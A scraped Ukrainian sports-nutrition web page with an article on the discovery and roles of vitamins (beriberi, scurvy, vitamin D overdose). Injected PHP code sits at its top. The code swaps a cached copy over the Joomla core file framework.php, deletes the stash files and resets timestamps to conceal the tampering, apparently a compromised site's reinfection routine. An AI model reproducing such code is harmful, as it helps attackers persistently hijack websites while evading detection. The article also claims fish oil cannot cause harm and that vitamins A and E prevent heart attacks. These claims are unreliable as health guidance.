$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Вітаміни - носії життя. | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Вітаміни - носії життя.

Головне питання: наскільки харчовий продукт природного походження  реально містить у собі життєвої енергії. Не викликає сумніву, що свіжовижатий сік здорового плоду або рослини ще містить життєві сили, здатні наситити людину. Але зрозуміло, що зберегти ці сили можна лише частково. Але, як відомо, люди всіляко прагнуть "покращити" природу: тому в соку або в інших рослинних продуктах "потрібне" відокремлюють від "непотрібного". Коли на зорі наукового дослідження проблем харчування прийшли до висновку, що важливий тільки "енергетичний зміст" і добре засвоюються "живильні" речовини, з харчових продуктів, наприклад з хлібного зерна або рису, почали видаляти неперетравні компоненти й пишатися білосніжною мукою і білосніжним рисом. Все це, зокрема щодо рису, довгий час не викликало ніяких побоювань. Потім з'явилися специфічні розлади: паралічі, парези й інші порушення неврологічного характеру, які отримали назву бері-бері. Пізніше стало ясно, що людям чогось не вистачає, і те, чого не вистачало, як раз і містилося в рисових очищення, які викидалися або згодовували свиням. Тоді стали наполегливо шукати це відсутню речовину і дійсно знайшли. Хімічно воно виявилося Аміном і, по всій видимості, було носієм життя (vita (лат.)). Так виникло слово вітамін - символ життєвої субстанції, яку люди неодмінно повинні отримувати разом з їжею. Згодом, крім цього, відкритого першим, вітаміну В, були виявлені й інші подібні речовини, усі вони стали іменуватися вітамінами, з додаванням, для розрізнення, однією з літер латинського алфавіту.

За визначенням, вітаміни це речовини, які організм сам виробляти не може, але надходження яких ззовні йому життєво необхідно.

Однак у кожного організму свої відносини з вітамінами. Так, більшість тварин можуть самі виробляти вітамін С, тобто для них це як би і не вітамін. А ось людина і, дивним чином, морська свинка на це не здатні. Їм необхідно отримувати вітамін С з їжею. Він міститься у всіх свіжих фруктах, і взагалі це один з найпоширеніших вітамінів. Якщо відсутній вітамін С, а точніше кажучи, свіжі продукти, люди захворюють на цингу; особливо нею потерпали моряки в далеких плаваннях, коли не було можливості поповнити запаси свіжого продовольства. У хворих на цингу з'являлися такі симптоми, як кровотечі, сильна слабкість, розхитування і випадання зубів.


Оскільки походження вітамінів пов'язано з життєвим процесом, їх довгий час вважали символом і гарантією здоров'я. На жаль, занадто пізно помітили, що передозування вітамінів знов-таки може мати дуже шкідливі наслідки, і особливо це властиво вітаміну D. Тепер відомо, що вітамін D, по суті, не справжній вітамін, а, швидше, гормон, і наш організм може сам його виробляти, але ця речовина здатна сприймати світ і активізується тільки під впливом світла. Справжнім вітаміном в даному випадку є світло, а вітамін D "всього лише" посередник. Тому дитячий рахіт можна лікувати (або попереджати) як світлом, так і вітаміном D, адже вітамін D, за давнім образним визначенням (Пфаундлер), і є "ув'язнене в пробірку сонячне світло".

За допомогою штучного опромінення виявилося можливим синтезувати так званий вітамін D і давати його у великих дозах, завдяки чому горезвісна "англійська хвороба", тобто рахіт, або дефіцит кальцію в кістках, повністю зникла. Але потім виявилася зворотний бік: все частіше виявлялося передчасне "звапніння" організму, з важкими наслідками і навіть смертельним результатом. Так все і тривало роками, поки медики не встановили нарешті причину цього явища - значні передозування вітаміну D.

Багатий природним вітаміном D перш за все риб'ячий жир. І від нього не може бути ніякої шкоди, так як високий вміст жиру виключає надмірне надходження вітаміну. Крім того, у риб'ячому жирі (як і в олії) присутня також вітамін А, дія якого прямо протилежно дії вітаміну D. Якщо останній призводить до різних відкладень, ущільнень і звапнінню, то вітамін А діє там, де відбуваються конструктивні, синтезуючі процеси. Тому нині вітамін А і схожий з ним вітамін Е посилено рекомендуються для профілактики, наприклад, закупорки судин і порушень коронарного кровообігу (інфаркту міокарда). Вітаміни A, D і Е розчиняються в жирі, а вітаміни В і С - у воді.

В ході подальших досліджень були відкриті також численні підгрупи вітамінів (Bi, B6, В12), а також нові вітаміни, наприклад вітамін F в складі жирів, які пізніше були ідентифіковані як ненасичені кислоти жирного ряду (див. нижче). У результаті виявилося, що наведене вище визначення вітаміну не завжди відповідає дійсності. Тому останнім часом взагалі уникають найменування "вітамін", віддаючи перевагу хімічним позначення відповідної речовини (вітамін С - аскорбінова кислота, вітамін В - тіамін і т. д.).

Насправді вітаміни - високоактивні біологічні речовини, носії певних життєвих процесів. Вступаючи в організм у підвищеній концентрації, вони можуть активізувати відповідні процеси. Але головне не окремі, ізольовані вітаміни, а, швидше, їх поєднання. Багато людей, однак, не обмежуються щоденними рекомендованими дозами, приймаючи збільшені дози, у багато разів перевищують вміст вітамінів у їжі. За певних захворюваннях це може бути корисно, але загальної ситуації з харчуванням не міняє, навпаки, в кінцевому рахунку сильно збільшена доза поступово стане недостатньою, її доведеться збільшувати знову і знову - замкнуте коло.

Як відомо «все добре в міру» тому дотримуйтесь рекомендацій виробників, не зловживайте, і будьте здорові та счасливі!

 

По матеріалм Отто Вольфа.
www.breath.ru

 
Харчування-здоровий спосіб життя Вітаміни - носії життя.